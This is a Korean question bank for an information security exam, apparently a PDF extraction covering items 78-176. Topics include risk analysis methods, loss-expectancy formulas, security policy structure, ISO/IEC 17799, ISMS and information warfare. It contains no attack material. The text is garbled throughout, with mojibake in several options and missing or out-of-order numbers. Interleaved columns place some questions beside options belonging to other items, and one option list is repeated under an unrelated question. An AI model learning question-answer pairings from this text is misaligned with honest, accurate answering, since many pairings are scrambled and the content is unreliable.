위험분석의 요소가 아닌것은? 1 위험 2 자산 3 정보 4 위협 79. 일반적인 위험분석 과정에 관한 설명 중 알 맞지 않은 것은? 1 위험분석과정은 조직의 자산을 식별하고 가치 를 파악하는 것으로 시작한다 2 조직의 정보 환경에 따라 가능한 위협요소를 식별한 후 발생가능성을 조사한다 3 위협요인이 영향을 끼칠 수 있는 자산의 취약성 존재여부를 파악하고 문제발생시 손실 을 측정한다 4 발견된 모든 위험으로부터 보호 대책을 구현 한다 80. 다음 위험분석 방법들 중 접근 방법이 다른 하나는? 1 수학공식 접근법 2 모테칼를로 시뮬레이션 3 순위결정법 4 과거자료 분석법 221
222 81. 다음 위험분석 방법들 중 비용/가치 분석, 예 산 계획, 자료분석이 비교적 쉬운 방법은? 1 델파이법 2 시나리오법 3 순위결정법 4 과거자료 분석법 82. 위험발생 요인에 가중치를 두어 위험을 추정 하는 방법으로 위험분석에 소요되는시간이 적고 분석하여야 하는 자원의 양이 적다는 장점이 있 는 위험분석 방법은무엇인가? 1 점수법 2 시나리오법 3 순위결정법 4 과거자료 분석법 83. 시스템에 관한 전문적인 지식을 가진 전문가 의 집단을 구성하고 위험을 분석및 평가하여 정 보시스템이 직면한 다양한 위험과 취약성을 토론 을 통해 분석하는 위험분석방법은 무엇인가? 1 점수법 2 시나리오법 3 순위결정법 4 델파이법 84. 위험분석의 첫 번째 단계로서 자산을 분류하 고 그 가치를 파악하여 손실 발생시전체의 영향 을 분석하는 과정을 무엇이라 하는가? 1 자산 식별과정 2 취약성 분석과정 3 자산 가치 분석과정 4 손실발생분석 과정 85. 다음중 자동화된 정보위험관리 패키지가 아 닌것은? 1 RISKPAC 2 BDSS(Bayesian Decision, Support System) 3 LRAM(Lawrence Livermor elaboratory Risk Anaysis) 4 ALE 86. 정보보호에 관한 법령을 크게 세 가지 분야 로 나눌 수 있는데 이에 해당되지 않는 것은? 1 정보 자체의 안전성 및 무결성의 보호 2 정보의 내용보호 3 불건전 정보 유통 방지 4 암호기술 사용 방지 87. 정보보호 관련 법령이 다루는 정보 자체의 안전성 및 무결성의 보호에 관한 내용이라 볼수 없는 것은? 1 정보통신망과 정보통신 시스템의 보호조치 2 데이터의 부정조작 변조 3 개인정보보호 4 전자서명 인증 88. 정보의 안전한 유통을 위한 정보보호에 필요 한 시책을 효율적으로 추진하기 위하여정보통신 망이용촉진및정보보호등에관한법률 제52조의 규 정에 의하여 설립된 기관으로 정보보호를 위한 정책및 제도를 조사연구로 부터 다양한 정보보호 관련 업무를 하는 기관은 무엇인가? 1 한국정보보호진흥원 2 국가정보원 3 국가보안기술연구소 4 국군기무사령부 89. 전자서명을 안전하고 신뢰성 있게 이용할 수 있는 환경을 조성하고 인증업무를 수행하도록, 전자서명법 제4조의 규정에 의하여 공인인증기관 이 지정되었다. 다음 중 지정된 공인인증 기관이 아닌 것은? 1 한국전산원 2 금융결제원 3 한국은행 4 한국전자인증 222
223 90. 정보보호와 관련하여 다른 법률과의 관계에 서 특별법의 지위를 가지며 정보보호의기본 지침 을 두고 있는 법률은 무엇인가? 1 전자서명법 2 정보통신망이용촉진 및 정보보호 등에 관한 법률 3 정보화촉진기본법 4 정보통신기반보호법 91. 다음 정보보호 관련법과 제도에 관한 설명 중 틀린 것은? 1 컴퓨터 범죄 방지를 위한 법률로는 형법, 정 보통신기반보호법, 정보통신망이용 촉진 및 정보 보호에 관한 법률에 규정되어 있다. 2 개인정보보호를 위한 법률이 제정되어 있다 3 전자서명 인증에 관하여는 전자서명법과 전자 거래기본법에 제정되어 있으나 공인인증기관 과 공개키 암호방식을 이용한 전자서명에 대하여 아직 법적인 효력이 아직 마련되어 있지 않다 4 불원 광고성 전자우편에 대하여는 정보 통신망이용 촉진 등에 관한 법률에 의해 규정 되어있다 92. 다음중 우리나라의 정보윤리문제를 전담하고 있는 곳은? 1 한국정보보호진흥원 2 한국통신진흥협회 3 정보통신윤리위원회 4 한국청소년문화연구소 93. 조직의 보안 목표를 달성하기 위해서는 보안 정책이 반드시 필요하다. 이러한 보안정책은 정 책에서 다루고 있는 범위에 따라 3 가지로 분류 할 수 있다. 다음 중 보안정책의 분류로 적합한 것은? 1 보안 프로그램 정책, 안티 바이러스 정책, 패스워드 정책 2 보안 프로그램 정책, 이슈 기반 정책, 시스템 기반 정책 3 이슈 기반 정책, 패스워드 정책, 인터넷 사용 정책 4 시스템 기반 정책, 패스워드 정책, 이메일 사용 정책 94. 기업의 특수성을 만족 시킬 수 있는 위험분 석 모델은 존재하지 않는다. 다음 중 어떤 전략 이 완벽한 위험분석을 하기 위한 대안인가? 1 기존의 위험분석 모델에 기반 하여 새로운 모델을 개발 한다 2 기존 위험분석 모델에 데이터를 강제로 맞춘다. 3 새로운 위험분석 모델을 처음부터 개발한다. 4 필요에 따라 위험분석 모델의 일부들을 적절히 준용하여 사용한다. 95. 다음 중 보안 정책의구조로 가장 적합한 것 은? 1 절차, 배경, 범위, 정책 기술, 행위 2 목적, 배경, 책임, 지침, 책임 3 목적, 배경, 범위, 정책 기술, 행위, 책임 4 절차, 목적, 범위, 정책 기술, 책임 223
224 96. 보안 정책의 정의(Define)하는 일반적인 순서 는? 1 보안 정책의 기초 작성, 경영진의 승인, 보안 정책의 구현 2 경영진의 승인, 보안 정책의 구현, 보안 정책 의 기초 작성 3 보안 정책의 구현, 보안 정책의 기초 작성, 경영진의 승인 4 경영진의 승인, 보안 정책의 기초 작성, 보안 정책의 구현 99. 보안정책의 수준 및 종류와 해당 설명으로 적합하지 않은 것은? 1 전사 보안 정책: 최상위 수준의 보안 정책 으로 하위 수준 보안 정책을 구현하는 데 필요한 방향 및 강제 사항을 제시함. 2 이슈 기반 보안 정책: 최근에 이슈가 되는 웜 처리 방법에 대한 보안 정책을 기술함. 3 지역(Local) 보안 정책: 지역 조직 및 기업에 특정한 보안 정책을 제시함. 4 보안 절차 및 체크리스트: 보안 정책에 기반한 표준 운영 절차를 제시함. 97. 다음 중 보안 정책에 대한 설명으로 적합한 것은? 1 보안 정책에 의하여 컴퓨터에 저장된 정보를 보호할 수 있다. 2 보안 정책에 의하여 네트워크를 보호할 수 있다. 3 보안 정책에 의하여 사람을 보호할 수 있다. 4 보안 정책에 의하여 담당자와 컴퓨터에 저장된 정보를 보호할 수 있다. 98. 보안 정책 수립에 참고할 수 있는 국제 표준 ISO/IEC 17799에 관한 설명이다. 다음 중 적절치 않은 것은? 1 ISO/IEC 17799는 정보보안 관리에 실행 지침 이다. 2 ISO/IEC 17799는 500 여 개의 보안 통제 항목을 제시하고 있으나 보안 정책과 관련된 내용은 없으므로 보안 정책 수립에 참고할 수 없다. 3 ISO/IEC 17799는 컴퓨터와 네트워크 보안에 대해서만 500개의 통제 항목을 제시하는 지침이다. 4 ISO/IEC 17799는 심사 및 인증용으로 사용할 수 있으며, PDCA 와 프로세스 접근법을 도입 하고 있다 100. 시스템이 정보를 처리하고 저장하며 전송하 는 데 필요한 정책 또는 지침이 필요하다. 그러 한 정책이나 지침을 수립하는 데에 가장 필요한 선수조건은 무엇인가? 1 소프트웨어 품목 일람 2 하드웨어 품목 일람 3 사용여부에 대한 조사 4 위험 분석 101. 보안 정책과 보안 절차와의 차이점에 대해 서 옳게 기술한 것은? 1 보안 정책은 누가, 무엇을, 왜 하여야 하는 지를 기술하는 반면 보안 절차는 어떻게, 어디서, 언제 하여야 하는 지를 기술한다. 2 보안 정책은 어떻게, 무엇을, 왜 하여야 하는 지를 기술하는 반면 보횬 喙 榻?누가, 어디서, 언제 하여야 하는 지를 기술한다. 3 보안정책은 누가, 어디서, 왜 하여야 하는 지를 기술하는 반면 보안절차는 어떻게, 무엇을, 언제 하여야 하는 지를 기술한다. 4 보안정책은 누가, 무엇을, 어떻게 하여야 하는 지를 기술하는 반면 보안절차는 왜, 어디서, 언제 하여야 하는 지를 기술한다. 224
225 102. 김철수는 외국의 여러 파트너들과 연계된 전자상거래 시스템 개발의 프로젝트 매니저이다. 보안 팀 및 개발 팀의 컨설팅을 받은 후, 그는 시스템의 웹사이트에서 사용자정보의 수집이 전 제되어야 함을 알게 되었다. 해당 시스템에 외국 의 개인정보 관련법 적용 평가를 위하여 최초로 수행하여야 할 단계는 무엇인가? 1 자신의 개인 법률 변호사에 연락을 취함. 2 회사의 법률 팀에 연락을 취함. 3 경험에 의한 추측을 함 4 시스템을 우선 개발하고 추후에 검토함 컴퓨터를 이용한 정보 시스템을 운영하는 위험 요소를 제어하는 데 가장 중요한 것 은 다 음 중에서 무엇인가? 1 위협을 유발하는 취약점 2 자산 평가 3 위협의 확인 4 공인과 인가 5 취약점 분석 106. 다음 중 어떤 위험 분석 모델이 덴마크에 위치한 RISO 연구소에 의해 개발되었는가? 1 Risk Dynamics 2 CCA (Consequence Cause Analysis) 3 FMECA (Failure Mode, Effects and Criticality Analysis) 4 Monte Carlo 107. 다음은 위험분석의 의미와 특징에 관한 설 명이다. 틀린 것은? 1 위험분석은 정보보호 대책 구현에 선행되어 수행되어야 한다. 2 효과?정보보안 프로그램의 초석으로서 의미를 가지고 있다. 3 정량적 분석방법이 정성적 분석방법보다 정확한 위험수준을 결정할 수 있다. 4 자산식별, 위협분석, 취약성 평가, 영향 평가, 대책선정, 권고안 작성 순으로 진행. 5 조직의 특수 상황을 고려한 정보보호 대책을 선정할 수 있다 다음은 계정 보안 방법에 관한 설명이다. 가 장 틀린 것은? 1 사용자 패스워드에 대한 암호화를 위해 MD5 를 사용한다. 2 SSL, PGP와 같은 암호화 프로토콜 사용한다. 3 시스템관리의 편의를 위해 계정과 패스워드를 일치시킨다. 4 시스템에서 기본적으로 사용하지 않는 계정은 삭제한다 시스템 환경 설정 관리의 주요 목적은 무엇 인가? 1 시스템 유지보수(system maintenance) 2 시스템 안정화(system stability) 3 시스템 운영(system operations) 4 시스템 추적(system tracking) 5 시스템 감사(system auditing) 108. 실패 트리 다이어그램(Failure Tree Diagram)을 생성할 때, 이벤트와 해당이벤트에 한 영향을 표현하는 모양은? 1 직사각형 2 다이아몬드 3 원 4 정사각형 109. 다음에서 정보보호 관리자의 역할에 대한 설명으로 틀린 것은? 1 조직의 전략 및 계획에 부응되는 정보보호 계획 수립 2 정보보호 대책의 구현과 운영 3 정보보호 인식제고 프로그램을 개발 4 정보보호 목적, 전략 및 정책을 결정 5 전사적인 정보보호 활동의 조정 및 감시 225
226 110. 위험을 회피하는 방법은 3 가지가 있다. 다 음 중 옳지 않은 것은? 1 위험 수용 (Accept) 2 위험완화 (Mitigate or reduce) 3 위험전가(Transfer) 4 위험제거(Remove) 111. 위험 관리 공식 "자산가치(Asset Value) x 노출 요소(Exposure Factor)"는 무엇을 계산 하는 공식인가? 1 단일 손실 기대치(Single Loss Expectancy) 2 수용 가능한 위험 3 투자비회수(Return on Investment) 4 연간 손실(Annual Loss) 112. 다음과 같은 상황에서 단일 손실 기대치 (Single Loss Expectancy)와 연간 손실 기대 치(Annual Loss Expectancy)는 각각 얼마인가? 상황) 1000명의 종업원을 가진 회사의 종업원 의 25%가 1주에 1시간에 해당하는 업무시간 에 웹 서핑을 하고 있다. 각 종업원의 시간 당 평균임금은 50원이며, 각각 1년에 50주를 근무한다고 가정한다. 1 12,500 원, 525,000 원 2 12,500 원, 650,000 원 3 13,500 원, 625,000 원 4 12,500 원, 625,000 원 113. 다음 중 어떤 것이 FMECA(Failure Mode, Effects and Criticality Analysis)의 강점 중 하나 인가? 1 위험을 실제 비용으로 환산 2 제한적인 범위의 뷰(View) 3 정량적인 분석 4 잠재적 실패 식별 114. 위험 평가 이론에서 3 가지 위험평가 방법 이 사용된다. 다음 중 3 가지에 해당하지 않는 위험 평가 방법은? 1 정량적인(Quantitative) 방법 2 정성적인(Qualitative) 방법 3 최소위험 평가 (Minimal Risk Assessment) 방법 4 지식기반(Knowledge-based) 또는 최선 실행 (Best practices).방법 115. 다음 중 두 가지 형식을 가지는 위험 분석 도구로서 그 중 한 가지 형식이 ISO 에 특화 되어있는 것은? 1 COBRA 2 Crystal Ball 3 Risk + 4 CRAMM 116. 한 조용한 마을에 핵폭탄이 투하되려고 한 다. 조용한 마을의 자산 가치는 900만원이다. 이 때 단일 손실 기대치(SLE: Single Loss Expectancy)는? 1 900만원 2 450만원 3 250만원 4 알 수 없다 117. 정보보호관리체계 (ISMS)의 준수를 강제하 고 감시함으로써 얻을 수 있는 결과는? 1 불만 있는 직원의 증가 2 보안 정책 위배의 증가 3 불만 있는 직원들이 소송에서 보다 쉽게 승소 할 수 있음 4 정보보안 관리자에 의한 관리사항 감소 118. 다음 중 어떤 영역의 통제의 고장이 전체 핵심 시스템을 위험에 빠뜨릴 수 있는가? 1 예비 부품 창고 자물쇠의 물리적 보안 2 관리 데이터에 대한 접근 통제 3 마케팅 데이터에 대한 접근 통제 4 테이프 저장 영역에 대한 접근 통제 226
227 119. 대다수의 조직에서 다음 중 어떤 영역이 가 장 중요한 법적 이슈인가? 124. 시점기반(time based) 위험 분석에서 침입 탐지시스템을 표현하는 통제의 종류는? 1 소프트웨어 사용 계약서 2 제3자 접근 및 트랜잭션 암호화 3 제3자 접근 및 전자상거래 4 제3자접근 및 법적인 서비스 계약 120. 다음 중 어떤 종류의 통제가 방화벽 또는 보안정책을 분류하는 기준인가? 1 탐지 2 방지 3 대응 4 수정 125. 다음 중 유럽에서 산업 표준 도구로 사용되 며 BS7799의 표준 척도를 측정하는 데 사용될 수 있는 도구로 HIPPA나 GLBA를 지원하는 도구 는? 1 탐지 3 방지 2 연동 4 대응 1 Risk + 3 CRAMM 2 Crystal Ball 4 COBRA 121. 분류시스템에서 사람들은 흔히 "Unclassified" 정보에 대해서 오해를 하고 있다. "unclassified"의 일반적인 의미는 무엇인가? 1 제한된("restricted") 정보 2 기밀("secret") 정보 3 민감하지 않은("non-sensitive") 정보 4 민감한("sensitive") 정보 122. 기존의 안티바이러스 소프트웨어를 관리하 고 바이러스 갑작스런 바이러스 범람의 피해를 처리하기 위하여 전담직원을 채용한다는 것은 다 음 중 무엇을 하기 위함인가? 1 대응 시간의 증가 2 탐지 시간의 감소 3 대응 시간의 감소 4 방지 시간의 감소 123. 위험 분석을 자동화에 도움을 주는 많은 도 구가 있다. 다음 중 수동적 분석 대비 그러한 도 구를 적용하는 것의 주요 장점은? 1 수동적 분석이 시간 측면에서 유리하다. 2 수동적 분석이 비용 측면에서 유리하다 3 수동적 분석은 추가적인 통제를 필요로 한다. 4 자동화된 방법은 부정확한 결과를 제공한다. 5 자동화된 방법은 시간 측면에서 불리하다 126. 다음 중 핵 시설의 보안과 안전을 위해 덴 마크의 RISO 연구소에서 고안된 방법은? 1 Critical Cause Attempts (CCA) 2 Control Criminal Attacks (CCA) 3 Cause Consequence Analysis (CCA) 4 Crisis Concerns Anatomy (CCA) 127. IT 프로젝트와 해당 지원 행위가 안전하게 수행됨을 보장하는 것은 다음 중 ISO 17799의 어떤 영역의 통제 목표인가? 1 시스템 보안 및 보호 2 시스템 파일 보안 3 지원 시스템 보안 4 프로젝트 보안 128. 다음 중 정성적인 위험분석 모델의 주요 초 점은 어느 것인가? 1 정량화 가능한 값을 위험에 할당 2 취약성 추정 3 주관적 분석 회피 4 연간 피해비용 계산 227
228 129. 웹 상에서 피드백을 수렴하거나, 설문조사 또는 Q&A를 하거나 하는 행위는 대부분의 웹사 이트에서 흔히 볼 수 있는 유용한 웹 응용이다. 다음 중 사용자 데이터를 수집하는 웹 응용에 대 한 보안 또는 법적인 요구사항이 아닌 것은? 1 민감한 정보는 보호되어야 한다. 2 입력 데이터는 반드시 완벽하게 처리되어야 한다. 3 데이터의 수집 및 저장을 위해서는 법적인 요구사항을 준수하여야 한다. 4 데이터는 검증을 위하여 사용자에게 반환 되어야 한다 5 어플리케이션은 의도하지 않은 시스템 접근을 허용하지 않아야 한다 국제 표준화 기구 이외에 ISO 또 다른 의미 는? 133. 응용 시스템내의 사용자 데이터의 손실, 수 정 및 오용 방지는 다음 중 ISO 17799의 어 떤 영역의 통제 목표인가? 1 응용 시스템의 보안 2 응용 위험 완화 3 응용 통제 및 접근 4 시스템 보안 134. 다음 중 위험 분석 모델 중, 추측통계학적 (stochastically)으로 생성된 랜덤 값을 분석 모델 에 삽입하는 복잡한 수학적 모델에 기반한 위험 분석 모델은? 1 몬테카를로(Monte Carlo) 2 이벤트 트리 3 CCA, Cause/Consequence Analysis 4 실패(Fault) 트리 1 정보시스템범위관리자 2 정보보안스캐너관리자 3 정보보안섹터관리자 4 정보시스템보안관리자 131. 실패 트리(fault tree) 다이어그램 사용시 직 사각형이 의미하는 것은? 1 논리적 조건 2 이벤트 3 예외 조건 4 실패(fault) 132. 몬테카를로(Monte Carlo) 위험 분석 방법은 해당 값들을 생성하기 위해 통계적인 방법을 적 용하여 실재현실을 시뮬레이션 한 목표 랜덤 값 들을 사용한다 그러한 값들을 설명하기 위해 다 음 중 어떤 것이 사용되는가? 1 Variables 2 Stochastic 3 Constant 4 Algebra 135. 상위 수준 보안 원칙 수립 시 문제의 정의 와 관련이 있는 보안 통제 항목을 정의하기 위한 단계는? 1 실패를 탐지하고 방지하고 대응하는 데 도움 이 되는 추가적인 통제의 생성 2 각 실패 또는 위협 노출의 영향 결정 3 반드시 다루어져야 할 시스템 또는 이슈의 식별 4 실패를 방지, 탐지 및 대응하기 위한 요구 사항의 정의 136. 대부분의 위험 분석은 정성적인 모델에 준 하고 있다. 다음 중 이러한 모델들의 고유한 위 험은? 1 결과가 위협 및 취약성을 고려하지 못함 2 결과를 도출하기 어려움 3 결과가 주관적이지 않음 4 결과가 편파적일 수있음 5 결과가 정량적인 모델에 비해 취약함 228
229 137. 정성적인 위험평가 방법과 정량적인 위험 평가 방법의 비교할 때 맞지 않은 것은? 141. 연간 손실 기대치(ALE: Annualized Loss Expectancy)가 계산되는 근거는? 1 정성적인 방법이 계산이 더 용이하다. 2 정성적인 방법 적용시, 결과가 주관적일 수 있다. 3 정성적인 방법은 높은 위험을 가진 영역을 식별할 수 없다. 4 정량적인 방법은 정성적인 방법에 비해 사업적인 결정에 적용이 용이하다 지식기반(Knowledge-based) 위험평가 툴 적용시의 절차로 적합하지 않은 것은? 1 문제 영역을 식별한다. 2 주요 위협을 식별한다. 3 시스템을 평가하기 위하여 컨설턴트를 접촉 한다. 4 대응수단(Countermeasures)을 선택하고 평가 한다 다음 중 추가적인 보안 대응 수단의 필요성 에 대한 사업적인 타당성을 개발하기 위해 흔히 사용되는 것은? 1 기존 서버, 소프트웨어 또는 네트워크 장비의 로그 2 해커들의 뉴스그룹 또는 게시판 3 신규 보안 소프트웨어나 제품의 브로셔 4 유관 기업에서 사용하고 있는 보안 대응 수단 에 대한 신문 또는 잡지기사 1 연간판매 총액 2 양도된 자산 가치 3 손실 평균액 4 단일 손실 기대치(Single Loss Expectancy) 142. "일반적으로 익스플로잇(exploits)은 시스템 침입을 위해 ( )을 이용하는 것이다" 에서 ( ) 적 합한 단어는? 1 핑스윞(ping sweep) 2 취약성(vulnerabilitie) 3 가용성 공격(availability attack) 4 버퍼오버플로(buffer overflow) 143. 다음은 컴퓨터 침해사고 대응에 관련하여 기술된 내용이다. 적합한 것은? 1 컴퓨터 침해사고는 기술적인 사항이므로 보안 솔루션으로 해결될 수 있다. 2 모든 침해사고는 서로 다른 원인에 따라 발생 하므로 침해사고 대응을 위한 표준 절차는 수립할 수 없다. 3 모든 침해사고는 동일한 원인에 따라 발생 하므로 침해사고 대응을 위한 표준 절차를 수립할 수 있다. 4 모든 침해사고가 서로 다른 원인에 따라 발생 하더라도 침해사고 대응을 위한 표준 절차를 수립함으로써 피해 비용을 최소화 할 수 있다 다음 중 위협분석에서 사용하는 위협 벡터 가 아닌 것은? 144. 다음 중 위협, 취약성, 자산 가치, 위험 상관 관계를 정확히 표현한 식은? 1 외부 공격자 2 내부공격자 3 악성코드에 의한 공격 4 정보전 1 위험(Risk) = 위협(Threats) x 취약성 (Vulnerability) x 자산 가치(Asset Value) 2 위험(Risk) = 위협(Threats) x 취약성 (Vulnerability) / 자산 가치(Asset Value) 3 위험(Risk) = 위협(Threats) / 취약성 (Vulnerability) x 자산 가치(Asset Value) 4 위험(Risk) = 자산 가치(Asset Value) / 위협 (Threats) x 취약성(Vulnerability) 229
230 145. 보안 정책에 대해 기술한 것 중 옳은 것은? 1 보안 정책은 반드시 문서화 되어 경영진의 승인과 지원을 받아야 한다. 2 개인 보안 정책은 무조건 승인을 받을 수 있다. 3 이메일 보안 정책은 사람마다 업무가 다르 므로 공통으로 만들 수 없다. 4 보안 정책은 한번 수립되면 수정할 필요가 없다 모든 정책에서 가장 필수적인 것은? 1 정책의 효율성과 준거성(Compliance)을 테스트하기 위한 수단. 2 모든 위반사항에 대해 조직은 책임이 없다는 문구 3 정책 개발에 사용된 참조 문서목록 4 해당정책 변경 시 연락해야 할 사람 목록 147. 특정 보안 위험이 발견되었다. 보안 정책을 개발함에 있어서 다음 단계는 무엇인가? 1 컨설턴트에 연락을 위하여 네트워크 보안을 요청한다. 2 보안위험이 내포된 시스템들을 셧 다운 한다. 3 위험을 관리할 수 있는 옵션이 무엇인지 결정 한다. 4 시스템과 네트워크로부터 모은 위험을 제거 한다 다음 중 어떤 요소가 보안 정책에 공통적으 로 포함되어 있는가? 1 위협, 취약성, 위험 노출 2 목적, 범위, 책임, 행위 3 기밀성, 무결성, 가용성 4 보호, 탐지, 방어, 복구 149. 전사 보안 정책은 다음 중 어떠한 정보를 포함하고 있는가? 1 하위 수준의 정책에서 구현되어야 할 전체 개요 2 일반 보안 영역의 구현 지침 3 인터넷 또는 패스워드의 사용과 같은 측정 영역에 대한 정보 4 정책을 수행하기 위한 단계별 절차 150. 문서화되지 않은 절차를 정의하기 위해 문 서화된 절차를 이용한다면, 어떤 체크리스트가 유용한가? 1 기밀성, 무결성, 가용성 2 누가, 무엇을, 언제, 어디서 3 보호, 탐지, 방어, 복구 4 전사 정책, 특정 정책, 절차 및 체크리스트 151. 다음 중 정보전(information warfare)의 예로 서 적합하지 않은 것은? 1 한 회사가 경쟁사의 컴퓨터를 해킹하여 고객 목록을 빼냄 2 한 회사의 연구소가 자신들의 연구에 대한 거짓정보를 웹사이트에 올려 경쟁사들을 오도함 3 외국의 정부가 기밀정보가 있는 테이프 저장 장치를 빼냄 4 해커가 한 회사에 침투하여 패스워드를 크래킹 함 152. 정보전(information warfare)이 발생하는 관 계에 대한 설명으로 옳지 않은 것은? 1 정부 대 정부 2 정부 대 회사 3 회사 대 정부 4 회사 대 회사 5 개인 대 회사 230
231 153. 정보전(information warfare)이 중요성으로 볼 수 없는 것은? 157. 깊이 있는 방어(Defense in Depth)란 가장 적절히 설명하고 있는 것은? 1 정보전은 현재에도 발생하고 있다 2 정보전은 지속적으로 발생할 전망이다. 3 정보전의 빈도가 증가하고 있다. 4 대부분의 회사들은 자신들은 안전하다고 생각하고 있다. 5 정보전은 미래의 일이므로 매우 중요하다 공격적 정보전의 예가 아닌 것은? 1 침해사고 대응 2 스파이 활동 3 거짓 정보 유포 4 해킹 5 공격에 대한 보복 155. 다음 중 방어적 정보전의 예가 아닌 것은? 1 재난복구계획(DRP) 2 침입 탐지 3 인증 4 거짓 정보 유포 5 암호화 156. 최소 권한 부여원칙(Principle of Least Privilege)은 다음 중 어떻게 설명될 수 있는가? 1 디렉토리 서비스에 의한 접근 통제 수단 2 조직 내 위험의 크기와 해당 위험을 관리하기 위한 비용 3 담당자에게 꼭 필요한 일을 할 수 있을 정도 의 접근 권한 부여 4 역할 기반 및 사용자 기반 접근 통제 1 방화벽, 침입탐지 시스템 등 다양한 보안 솔루션의 설치 2 정보전을 수행하는 데 필요한 싸이버 무기와 방어 솔루션 3 접근 통제 수단의 강화 4 정보보호를 위해서는 다중보안이 필요하다는 의미 158. 사회공학(Social Engineering)을 방어하기 위 한 대책으로 적절하지 않은 것은? 1 적절한 보안 정책을 수립 한다 2 접근 등을 부여하는 절차를 수립하고 위반을 보고하는 절차를 수립 한다 3 취약점과 의심스러운 행위에 대한 보고의무에 대해 사용자를 교육 한다. 4 방화벽 침입탐지 시스템을 설치하고 적절히 운영 한다 159. 위험평가의 목적은 무엇인가? 1 추가적인 보안 통제항목을 결정하기 위함 2 전체적인 보안에 대한 영향과 제3자가 고수 하여야 할 서비스 계약사항을 도출하기 위함 3 제3자에게 보안 접근을 허용할 지를 결정하기 위함 4 위험을 식별하여 해당 위험이 전체적인 보안에 미치는 영향을 파악하기 위함 좋은 보안 정책을 작성하기 위하여 가장 우 선적으로 고려되어야 할 사항은? 1 실무적인 측면 2 준수 여부의 측정 가능 측면 3 즉시 적용 가능 측면 4 특정적인 측면 231
232 161. 상위수준 보안 정책은 조직이 달성하여야 할 보안에 대한 미션과 동일한 의미로 간주된다. 그 이유는 무엇인가? 1 상위수준 보안 정책은 사업목적의 달성과 위험에 속하는 문제이므로 보안 평가에 관련된 모든 사람들에게 전달되어야 할 사항 이므로 2 상위수준 보안정책은 경영층이 사업 목적과 정보의 중요성 관계를 인식하고 있다는 것을 나타내고 조직의 모든 사람이 준수하여야 할 보안 원칙을 명문화한 사항이므로 3 상위수준 보안 정책은 사업과 보안 관리의 관계에 대한 사항이고 조직의 보안 평가의 원칙이므로 4 상위수준 보안 정책은 사업을 하기 위한 보안에 속하는 모든 이슈에 대한 사항이므로 162. 경영층의 승인 과정에서 신규 시스템의 설 치 승인에 소수의 사람이 관여하는 것이 왜 중요 한가? 1 일관성 유지 2 소수의 사람들만이 보안 위험과 관련이 있으므로 3 소수의 사람들이 단순 무작위 검사를 수행 하기에 용이하므로 4 직원 고용 비용을 줄이기 위하여 163. 위험 처치(risk treatment) 계획은 다음 중 어떠한 것으로 활용될 수 있는가? 1 상위 수준 체크리스트 2 위험 매트릭스 3 보안 정책 4 하위 수준 체크리스트 164. ISMS의 약자는 무엇을 나타내는가? 1 국제 보안 관리 시스템(International Security Management System) 2 보안 담당 정보시스템보안 관리자 (Information System Manager of Security) 3 정보 보안 관리시스템(Information Security Management System) 4 국제시스템관리표준(International System Management Standards) 165. 문서 보안 관리를 효과적으로 수행하기 위 해서 필요한 사항들은? I. 중앙 집중 문서 작성 절차 수립 II. 산업 표준 데이터베이스 및 오피스 소프트 웨어의 사용 III. 중앙 집중 문서 관리 조직에 의한 문서 관리 IV. 문서 보안에 대한 주기적인 리뷰 V. 웹 기반 문서 저장 및 분출 관리 1 I, II, 및 III 2 I, III, 및 IV 3 II, III, 및 IV 4 I, IV, 및 V 5 II, III, IV, 및 V 166. 조직의 민감한 정보에 접근해야 하는 제3자 와 비밀유지계약서를 작성하는 것이 중요한 이유 는? 1 조직의 잠재적인 보안 위협을 관리하기 위해서 2 특정 프로젝트의 참여자의 정확한 수를 계산 하기 위해서 3 관련된 모든 정보에 대한 기밀성과 안전성을 보장하기 위해서 4 제 3자의 서비스와 조직의 계약사항을 연계 시키기 위해서 232
233 167. 정보 보안 관리시스템(ISMS)의 개발과정에 서 경영진과 가장 흔히 연관되는 두 가지 문제점 은 무엇인가? I. 추가 통제 항목에 대해 상급 경영진 설득의 실패 II. 필요한 통제 항목 적용의 실패 III. 정보 자산 식별 실패 IV. 정보자산과 비즈니스 관계의 이해에 대한 실패 1 I 및 IV 2 I 및 II 3 III 및 IV 4 II 및 III 171. 정보 보안 관리시스템(ISMS)의 감시 및 재 검토에서 옳지 않은 것은? 1 많은 작업을 필요로 한다. 2 능동적일 필요가 있다 가 매우 유용하다. 4 지속적으로 수행되어야 한다 고용 조건 및 기밀성 측면에서, 인트라넷 기 반의 교육훈련프로그램을 마련한다는 것은 ISO/IEC 17799의 어떤 레벨 해당하는 공정 개선 의 예인가? 168. 의무의 분리(segregation of duties)를 구현 하기 위해 고려하여야 할 사항 중 꼭 필요한 사 항이 아닌 것은? 1 레벨 I 3 레벨 III 2 레벨 II 4 레벨 IV 1 리포팅 3 로깅 2 보안 경고 4 키 관리 173. 조직 내에서 정보보안협의체를 구성할 때, 경영진 대표들의 직무 연합 포럼을 구성하는 것 이 바람직한 경우는? 169. 정보보안 정책 문서는 누구에 의하여 작성 되어야 하는가? 1 조정 위원회 2 보안 관리자 3 자발적 신청자 4 회사 사장 170. 보안 의식 수준 향상 프로그램이 갖추어야 할 요소는? I. 추가 통제 항목에 대해 상급 경영진 설득의 실패 II. 필요한 통제 항목 적용의 실패 III. 정보 자산 식별 실패 IV. 정보자산과 비즈니스 관계의 이해에 대한 실패 1 I, II, 및 IV 2 I, II, 및 V 3 I, II, 및 III 4 II, III, 및 IV 1 조직의 규모가 대규모일 때 2 여러 부서를 관?때 3 여러 가지의 민감한 파일을 관리할 때 4 경영자가 조직 내에서 여러 가지 역할을 수행 할 때 표준 인증서의 일반적인 유효기간은? 1 2년 2 1년 3 무기한 4 3년 175. 패치의 진단 및 적용은 변경통제절차 (Change Control Process) 개선의 어떤 레벨인 가? 1 레벨 II 2 레벨 I 3 레벨 IV 4 레벨 III 176. 상위수준 보안 정책(HLSP) 지침에서 가장 중요한 핵심 자산의 식별자는 무엇인가? 1 회사 건물 3 위험 평가 2 자산 분류 4 피해손실액 233
